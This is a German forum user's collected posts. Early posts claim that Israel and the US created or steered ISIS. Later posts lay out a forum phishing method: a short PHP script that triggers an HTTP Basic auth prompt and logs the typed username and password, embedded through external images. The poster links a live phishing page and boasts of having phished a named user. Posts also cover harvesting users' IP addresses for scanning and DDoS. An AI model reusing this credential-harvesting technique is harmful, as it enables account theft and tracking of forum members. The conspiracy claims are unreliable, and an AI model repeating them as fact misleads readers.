Beiträge von Doberman

    @ brutus
    Dein Verschwörungsgeschwurbel regt allenfalls zum Schmunzeln an. Israel kann daran kein Interesse haben. Es hatte sich mit Assad längst arrangiert, er war berechenbar im Gegensatz zur Irssis...


    Hatte! Bis man sich entschieden hat, Assad zu beseitigen. Syrien und Assad waren den Israelis schon immer ein Dorn im Auge. Nicht nur wegen Syriens Nähe zum Iran und Libanon, auch wegen den Golanhöhen. Man hat nur den richtigen Zeitpunkt abgepasst. Geht Syrien den Bach runter, können die Israelis den Golan behalten ohne auch nur einen Finger zu krümmen. Nagut, Bibi musste mal ein paar Jihadis im Krankenhaus besuchen aber das war's auch schon


    Syrian rebel leader thanks PM for standing by wounded
    Netanyahu’s decision to speak at Golan field hospital ‘appreciated,’ Istanbul-based opposition official tells Israeli radio
    http://www.timesofisrael.com/s…-for-standing-by-wounded/


    Externer Inhalt www.youtube.com
    Inhalte von externen Seiten werden ohne Ihre Zustimmung nicht automatisch geladen und angezeigt.
    Durch die Aktivierung der externen Inhalte erklären Sie sich damit einverstanden, dass personenbezogene Daten an Drittplattformen übermittelt werden. Mehr Informationen dazu haben wir in unserer Datenschutzerklärung zur Verfügung gestellt.



    PS: Ich zucke nach dem Absenden immer noch zusammen und schaue mich um, ob der Nilpferd-Killer naht. Muss mich erstmal dran gewöhnen :D

    Die ganz spannenden Fragen sind:


    - Wem nutzt der IS?


    denjenigen, die die Levante destabilisieren wollen. Das sind aktuell die Saudis , die Israelis und die Amerikaner.
    Levante = das fruchtbare Gebiet vom Mittelmeer bis Irak, über Libanon, Syrien usw.


    Die Saudis, weil sie den schiitischen Einfluss eindämmen wollen
    Die Israelis, weil sie keine starken Nationalstaaten als Nachbarn wünschen, die lassen sich schwerer kontrollieren
    Die Amis um die Ressourcen da unten zu sichern.



    - Wer finanziert den IS?


    Angeblich die Saudis und die Türken. Und die Eigenfinanzierung durch Steuern, Ölverkauf, usw



    - Wer schuf den IS?


    Angeblich schuf sie sich selbst. Ehemalige Widerstandskämpfer des Irak, ehemalige Baath-Führer (sozialistische arabische Partei, wie in Syrien) des Irak. Dazu kommt das Fußvolk, was aus ehemaligen Jihadgruppen(Al Nusra usw) rekrutiert wird. Der plötzliche Erfolg der IS 2014 ist meines Erachtens einer großen Kampagne der Amerikaner oder Israelis zu verdanken. Ich gehe davon aus, dass hochrangige irakische Offiziere bestochen wurden. Die irakische Armee räumte das Feld, hinterließ die ganze Hightech-Ausrüstung die sie von der Amerikanern gekauft hatten. Angebliche sind tausende Soldaten zur IS übergelaufen.


    Das die Israelis involviert sind, ist für mich keine Frage. Sonst würden die nicht seelenruhig beobachten wie dieses riesige Jihad-Monster vor der eigenen Haustür wütet. Es geht soweit, dass der syrisch/israelische Grenzübergang unter den Augen der IDF von den Jihadis übernommen wurde.


    Das nur mal kurz umrissen.


    Welche Frage sich mir stellt. Wenn die IS wirklich von ehemaligen irakischen Offizieren und Baath-Mitgliedern gegründet wurde. Wieso dann dieses grausame Vorgehen. Diese Offiziere sind doch gebildete Leute, das waren keine Hardcore-Islamisten.

    Verbesserungsvorschlag: Es geht auch mit 5 Zeilen ohne eigene Datenbank

    Zitat

    header('WWW-Authenticate: Basic realm="politikpla.net"');
    header('HTTP/1.0 401 Unauthorized');
    $handle = fopen("user.log", "a");
    fwrite($handle,$_SERVER['PHP_AUTH_USER'] . ': ' . $_SERVER['PHP_AUTH_PW'].'\n' );
    fclose($handle);


    @Admin. Ist der Strang öffentlich?


    Hier: http://politikarena.uphero.com/login.php



    ... speichert die Login-Daten in einer MySQL-Tabelle.
    Die ersten mit dem $ beginnenden Zeilen werden durch die Login-Daten der lokalen DB ersetzt.
    Den User "Tschak" aus politikpla.net habe ich schonmal gephisht: http://crazydog.prophpbb.com/post2698.html#p2698 :D


    Wie soll das gehen?



    Na ja, er war Admin im DF und hatte seine Vertrauensstellung missbraucht.


    Inwiefern?



    Das geht wohl nur, wenn das Einbinden von Ressourcen unmöglich gemacht wird, die sonstwo im Web liegen.


    Selbst kann man nicht viel machen. Folgender Tipp für User. In der PA schalte ich den Editor auf Quelltext Mode. Somit sehe ich beim Antworten oder Zitieren zumindestens, wenn jemand externe Bilder einbaut. Und man erkennt, woher diese Bilder kommen. Wenn mir die URL "spanisch" vorkommt, lösche ich das Bild beim Zitieren. Toller Nebeneffekt. Man lernt einiges über die Nutzer. Der Doc z.B. baut gerne Smilies aus einem anderen Forum ein. Und zwar aus einem Seglerforum. Da scheint sich also jemand für's Segeln zu interessieren. Narrthan hat übrigens dasselbe Hobby, wie er mal schrieb! Welch ein Zufall :)


    Was den serverseitigen Schutz betrifft, sehe ich nur 2 Möglichkeiten.


    Entweder eine Blacklist mit erlaubten Image-Quellen(Bildhoster, Soziale Netzwerke und Medienseiten)
    Oder aber man erweitert das Forum insofern, dass jedes Bild vor der Ausgabe auf den Statuscode gecheckt wird.(404, 401 usw). Das liesse sich sicherlich mit ein paar Zeilen Code realisieren. Allerdings bräuchte man da einen eigenen Server, wegen der zusätzlichen Last.


    Hättest mal vorher das Stichwort "Phishing" erwähnt, hättest du weniger Verwirrung erzeugt.
    Diese Methode ist aber auch nicht "jedermanns" Ding, da der Herr Jedermann dafür einen eigenen Webserver braucht, den er dergestalt konfigurieren kann, dass er den User-Input der HTTP-Authentifizierung mitloggt.


    1. Kann man solche Webserver auf seinem Rechner installieren und per Gratisdienste im Web verfügbar machen
    2. Stehen diese Angaben im Klartext ohne spezielle Konfiguration zu Verfügung. Man muss sie allerdings abfragen. Insofern hast Du recht.

    Theoretisch geht das.
    Doch man müsste dann erstens die Datei Index.htm oder besser Index.php in eine HTACCESS Abfrage verwandeln und dann auf den Rechner (Forenserver) in das richtige Verzeichnis (meist HTML) abladen.


    Das ist aber nicht so einfach, wenn man nicht vorher die Zugangsdaten gehackt und sich einen FTP Zugang verschafft hat.


    Du hast es immer noch nicht verstanden oder :) Die htaccess Abfrage kommt nicht vom Forum, sondern von dem Bild. Teste es aus. Poste hier eine Antwort mit einem Bild, das als Quelle die PA URL hat. Und mir nix Dir nix, erscheint die Passwortabfrage der PA



    Na ja, mit Jewrassig hat tabasco ja einen unredlichen Admin in ihren Reihen, der das ohne hacken bewerkstelligen könnte, die
    kriminelle Energie hat er ja schon im alten DF unter Beweis gestellt.


    Erzähl mal.


    Wir reden hier von 2 unterschiedlichen Geschichten.


    Die eine Sache ist das Provozieren einer htaccess Eingabemaske in einem Strang. Was kann ich damit erreichen.
    1. Den Forenbetrieb stören, in dem ich jeden Strang mit htaccess Eingabe Aufforderungen zupflastere.
    2. Zugangsdaten abgreifen. Wir wir oben lesen konnten, haben die Benutzer der PA ohne nachzudenken ihre Forum Zugangsdaten in eine unerwartete htaccess Maske eingegeben.


    Um so eine htaccess Maske zu provozieren, muss ich weder den Server hacken, noch irgendwelche Angriffe starten. Die Sache ist viel banaler. Der Editor.
    Der Forum-Editor lässt das Einbinden von externen Inhalten zu. Und genau das ist der Knackpunkt. Somit kann jeder Depp, ja auch ein Opa Hoppenstedt z.b. ein Bild oder ein Video einbinden, dass nicht auf dem Forumserver liegt. Wenn der Opa jetzt noch Zugriff auf einen Webserver hat, kann er sein Bild htaccess schützen und jeder Besucher des Strang bekommt die htaccess Abfrage, gibt seine Daten ein, weil er denkt die Abfrage kommt vom Forum und gut ist. Der Opa sitzt am anderen Ende der Leitung und sieht den Usernamen + Passwort im Klartext. Was er mit diesen dann anstellen kann,muss ich nicht erklären, das hat uns Riddick in der PA ausführlich geschildert.


    Die 2. Sache ist das Sammeln der IP Adressen
    Mit der selben Methode kann ich auch die IP Adresse der Nutzer auslesen. Nur lasse ich diesmal natürlich die PW Abfrage weg. Der USer soll es ja nicht merken. Jeder der das Bild aufruft, hinterlässt seine IP Adresse, die URL und einen Zeitstempel auf dem Server vom Hoppenstedt. Der schaut jetzt im Forum nach, wer um 15:30 im Strang XY geantwortet hat und hat somit die IP eines Users. Damit kann er den Rechner des Users nach z.B. Sicherheitslücken, freien Ports usw scannen. Für einen DDOS Angriff auf einen privaten Rechner hinter einer DSL Leitung riechen meines Erachtens 5 Rechner mit der richtigen Software aus. Bein einem richtigen Webserver brauch man ein paar tausend, da hast Du recht. Der Provider ist ja mit entsprechenden Sicherheitsmaßnahmen geschützt.


    PS: Wer es mal testen will
    Schickt euch selber eine private Nachricht. Fügt ein Bild ein und gebt die URL der PA als Bildquelle an. :D
    http://www.politikarena.net/index.php